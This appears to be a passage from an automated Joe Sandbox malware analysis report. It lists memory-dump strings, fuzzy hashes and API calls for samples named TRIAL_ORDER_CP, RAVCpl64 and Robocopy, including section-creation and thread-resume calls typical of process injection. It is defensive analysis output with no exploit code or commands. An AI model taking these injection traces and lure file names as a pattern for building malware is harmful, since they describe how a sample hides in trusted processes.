                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: e73e06b3fff1b77ee9d1a4012182f8ce6302a5112558337b5e7adf58d135e428
                                          • Instruction ID: 7e57bfcd6928067002cb10b7f32106077b88dd7a382b55720f5c890dafc1940c
                                          • Opcode Fuzzy Hash: e73e06b3fff1b77ee9d1a4012182f8ce6302a5112558337b5e7adf58d135e428
                                          • Instruction Fuzzy Hash: 91512471A00359BBEB109BA8DC96FED73ACEF08340F4404BAF515AB180EB709A41DF54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972047929.0000000033800000.00000040.00001000.00020000.00000000.sdmp, Offset: 33800000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33800000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: A\G$CJA@$EPMK$EPMK$ETTH$LEJC$MGEP$PA\P$SAFT$THMG$THMG
                                          • API String ID: 0-799575282
                                          • Opcode ID: fb54952eba79a1746054eadf5c979e0c0428e6eec8eb07ef272fc66bf6309d23
                                          • Instruction ID: 3e2ca6ebfbd15d1a09338510eb13f61778ebfca1b692e4001204805fe2f73c20
                                          • Opcode Fuzzy Hash: fb54952eba79a1746054eadf5c979e0c0428e6eec8eb07ef272fc66bf6309d23
                                          • Instruction Fuzzy Hash: AE3122B090434DDACF25DF98D054ADEBBB1FF10348F828159E8696F201DBB58699CB89
                                          Strings
                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33B777E2
                                          • Actx , xrefs: 33B77819, 33B77880
                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33B77807
                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 33B777DD, 33B77802
                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 33B778F3
                                          • SsHd, xrefs: 33B2A304
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                          • API String ID: 0-1988757188
                                          • Opcode ID: 7d0fe05e88076cfcdbf9906444430e1888142919cca1d65f3a1a4db06256de11
                                          • Instruction ID: b6b3e4c76c3d86d6ed3097897ef219f2e6a50cf756c19f0e79db0013b44031b4
                                          • Opcode Fuzzy Hash: 7d0fe05e88076cfcdbf9906444430e1888142919cca1d65f3a1a4db06256de11
                                          • Instruction Fuzzy Hash: 22E18B74A04312CFE715CE24C890B6ABBE5FF85264F584B3DE8A9CB290DB31D945CB91
                                          APIs
                                          Strings
                                          • GsHd, xrefs: 33B2D794
                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33B79153
                                          • Actx , xrefs: 33B79315
                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33B79178
                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 33B7914E, 33B79173
                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 33B79372
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                          • API String ID: 3446177414-2196497285
                                          • Opcode ID: 7a68466e01ddd6906b90fafb9e35e05884bf0930c46b0b0eaca642f1e0eef7ea
                                          • Instruction ID: 4b8d99b213c72faed87919f3134bcee6a452e5da27e1a2b56e770483d76aa9cc
                                          • Opcode Fuzzy Hash: 7a68466e01ddd6906b90fafb9e35e05884bf0930c46b0b0eaca642f1e0eef7ea
                                          • Instruction Fuzzy Hash: 7EE18074A043519FE700CF14C880B4ABBE4FF88394F484A7DE9A9DB691D771D944CB92
                                          APIs
                                          • RtlDebugPrintTimes.NTDLL ref: 33B0651C
                                            • Part of subcall function 33B06565: RtlDebugPrintTimes.NTDLL ref: 33B06614
                                            • Part of subcall function 33B06565: RtlDebugPrintTimes.NTDLL ref: 33B0665F
                                          Strings
                                          • apphelp.dll, xrefs: 33B06446
                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 33B697B9
                                          • LdrpInitShimEngine, xrefs: 33B69783, 33B69796, 33B697BF
                                          • minkernel\ntdll\ldrinit.c, xrefs: 33B697A0, 33B697C9
                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 33B6977C
                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 33B69790
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-204845295
                                          • Opcode ID: 7ccbedb8be3ff4a69870a689a2e28ea5275b69e31e1b4e8f3ef441d99cf208c5
                                          • Instruction ID: 0fd7a3e6b1a89b0017b82e2fe421ec5d24dbe3a06367cb02a5d6c50836b5926f
                                          • Opcode Fuzzy Hash: 7ccbedb8be3ff4a69870a689a2e28ea5275b69e31e1b4e8f3ef441d99cf208c5
                                          • Instruction Fuzzy Hash: 8F51AEB56093449FE320DF24C891FABBBE8FB84648F40092AF99497561DB30DE05CF92
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                          • API String ID: 3446177414-4227709934
                                          • Opcode ID: 49a53442d4169cbd001ed84ab10852a8d427f4f556060d5265227fbc9eaa1afd
                                          • Instruction ID: 0389f07c0fc051387e77cef870d048aa0870b17e8ed74b455cb0d8fb8ea647ec
                                          • Opcode Fuzzy Hash: 49a53442d4169cbd001ed84ab10852a8d427f4f556060d5265227fbc9eaa1afd
                                          • Instruction Fuzzy Hash: 26416BB9A01299ABDB01DF98D980ADEBBB5FF88754F150229E854BB340D771DE01CB90
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                          • API String ID: 3446177414-3492000579
                                          • Opcode ID: 58e1ecba36891039820f14b7941079c6ac38c6db86ec1cabead5a19b4e0b3b61
                                          • Instruction ID: ea4496394c34345cf3972b7c1053480facaec787bcb37134a95e2620623712e0
                                          • Opcode Fuzzy Hash: 58e1ecba36891039820f14b7941079c6ac38c6db86ec1cabead5a19b4e0b3b61
                                          • Instruction Fuzzy Hash: A771DB75901694AFCB15DFA8D490AAEFBF2FF49304F08826AE484AB651CB31D981CF50
                                          APIs
                                          Strings
                                          • LdrpLoadShimEngine, xrefs: 33B6984A, 33B6988B
                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33B69843
                                          • minkernel\ntdll\ldrinit.c, xrefs: 33B69854, 33B69895
                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33B69885
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-3589223738
                                          • Opcode ID: 7d4c1218349a7b6ddd2425da1dd49de0344c49a8f4675564b6ebe13228983c74
                                          • Instruction ID: 57fb437a1db3e4dc7c7af018a3c02f326fb0c7600bd7729fd75c83943e70d1e9
                                          • Opcode Fuzzy Hash: 7d4c1218349a7b6ddd2425da1dd49de0344c49a8f4675564b6ebe13228983c74
                                          • Instruction Fuzzy Hash: 8151D176A103A89FDB14EBA8C854F9DBBA6FB44348F05017AE450FB296DB70DC41CB90
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                          • API String ID: 3446177414-3224558752
                                          • Opcode ID: 8b9b6e1aad8e17d7ddc0c02e67e5c8c1414ca31c5ac03c1dfc7401f8091f7316
                                          • Instruction ID: 46edd873cc1413c904fc000dc525a80c86eead1276e75008fb3718a264c80819
                                          • Opcode Fuzzy Hash: 8b9b6e1aad8e17d7ddc0c02e67e5c8c1414ca31c5ac03c1dfc7401f8091f7316
                                          • Instruction Fuzzy Hash: C3416934A09764DFE301DF2CC544B4AB7A8FF81364F0886B9E96587691CB78E980CB95
                                          APIs
                                          Strings
                                          • Entry Heap Size , xrefs: 33BBEDED
                                          • ---------------------------------------, xrefs: 33BBEDF9
                                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 33BBEDE3
                                          • HEAP: , xrefs: 33BBECDD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                          • API String ID: 3446177414-1102453626
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                          • API String ID: 3446177414-1222099010
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$@
                                          • API String ID: 3446177414-1194432280
                                          APIs
                                          Strings
                                          • LdrpFindDllActivationContext, xrefs: 33B83440, 33B8346C
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 33B83466
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 33B83439
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 33B8344A, 33B83476
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 3446177414-3779518884
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 3446177414-3610490719
                                          APIs
                                          Strings
                                          • LdrpCheckModule, xrefs: 33B79F24
                                          • minkernel\ntdll\ldrinit.c, xrefs: 33B79F2E
                                          • Failed to allocated memory for shimmed module list, xrefs: 33B79F1C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-161242083
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                          • String ID:
                                          • API String ID: 4281723722-0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0$Flst
                                          • API String ID: 0-758220159
                                          APIs
                                          Strings
                                          • kLsE, xrefs: 33B105FE
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 33B10586
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 3446177414-2547482624
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: 0$0
                                          • API String ID: 3446177414-203156872

                                          Execution Graph

                                          Execution Coverage:1.7%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:30
                                          Total number of Limit Nodes:0
                                          [execution graph rendering omitted; entry nodes 4742877, 47426a1, 47426f8, 47425f8, 4746a5a; API calls on the graph: SleepEx, NtResumeThread, NtCreateSection]

                                          Control-flow Graph

                                          [control-flow graph rendering omitted; function 47425f8, blocks 47425a2-474286d; API calls SleepEx and NtCreateSection, internal call to 474fb46]
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.275190559830.0000000004680000.00000040.00000001.00040000.00000000.sdmp, Offset: 04680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4680000_RAVCpl64.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@
                                          • API String ID: 0-149943524

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.275190559830.0000000004680000.00000040.00000001.00040000.00000000.sdmp, Offset: 04680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4680000_RAVCpl64.jbxd
                                          Similarity
                                          • API ID: ResumeSleepThread
                                          • String ID:
                                          • API String ID: 1530989685-0

                                          Control-flow Graph

                                          [control-flow graph rendering omitted; function 47426f8, blocks 47426f8-474286d; API calls SleepEx and NtCreateSection, internal call to 474fb46]
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.275190559830.0000000004680000.00000040.00000001.00040000.00000000.sdmp, Offset: 04680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4680000_RAVCpl64.jbxd
                                          Similarity
                                          • API ID: CreateSectionSleep
                                          • String ID:
                                          • API String ID: 2866269021-0

                                          Execution Graph

                                          Execution Coverage:0.4%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:9
                                          Total number of Limit Nodes:1
                                          [execution graph rendering omitted; nodes 45a29f0 (LdrInitializeThunk), 488efda (NtQueryInformationProcess), 45a2b20 (LdrInitializeThunk)]

                                          Control-flow Graph

                                          [control-flow graph rendering omitted; function 488efda, blocks 488efda-488f64d; API call NtQueryInformationProcess plus numerous internal calls]
                                          APIs
                                          • NtQueryInformationProcess.NTDLL ref: 0488F1A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272503644308.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4880000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InformationProcessQuery
                                          • String ID: 0
                                          • API String ID: 1778838933-4108050209

                                          Control-flow Graph

                                          [control-flow graph rendering omitted; single block 45a34e0-45a34ec calling LdrInitializeThunk]
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3156926997b1f7a24ca18f42b1de3473d130d2458d1ce1ef292b428d4d279efb
                                          • Instruction ID: eb307aba56701240af6218b3ca6731ef01073b2e37c1c18d4b4ddffb52fdb928
                                          • Opcode Fuzzy Hash: 3156926997b1f7a24ca18f42b1de3473d130d2458d1ce1ef292b428d4d279efb
                                          • Instruction Fuzzy Hash: A290023160510403F50071584624786104997D0245F61DC15B0C15568DC7A5D95575E2

                                          Control-flow Graph
                                          control_flow_graph 147 45a2c30-45a2c3c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: dcc4041cddedc3b505677dc83678c3a465a3fd84ee3a5cea1983ffdc878e6519
                                          • Instruction ID: 9c8dff7fe18b5690daab9d8b3dca5e3d72a1c5367f25d250763bd25c49f96023
                                          • Opcode Fuzzy Hash: dcc4041cddedc3b505677dc83678c3a465a3fd84ee3a5cea1983ffdc878e6519
                                          • Instruction Fuzzy Hash: 7E90022921300003F5807158551868A004997D1246F91EC19B0806558CC925D86D7361

                                          Control-flow Graph
                                          control_flow_graph 148 45a2cf0-45a2cfc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4bde475cfac802d74e2435463f7e7f60e2c64770cfd5bee0486addbfc153bf9a
                                          • Instruction ID: e1587b0c88574fefa4009bdcdb6ced36c8084046698c70c4aae5ec19cbe966ed
                                          • Opcode Fuzzy Hash: 4bde475cfac802d74e2435463f7e7f60e2c64770cfd5bee0486addbfc153bf9a
                                          • Instruction Fuzzy Hash: 1F900221242041537945B1584514587404AA7E0285791D816B1C05950CC536E85AF661

                                          Control-flow Graph
                                          control_flow_graph 149 45a2d10-45a2d1c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ab178b0aee38f2db8c7c44d4e8059a1718a6ec9e4b5b588cb736d623f40070cd
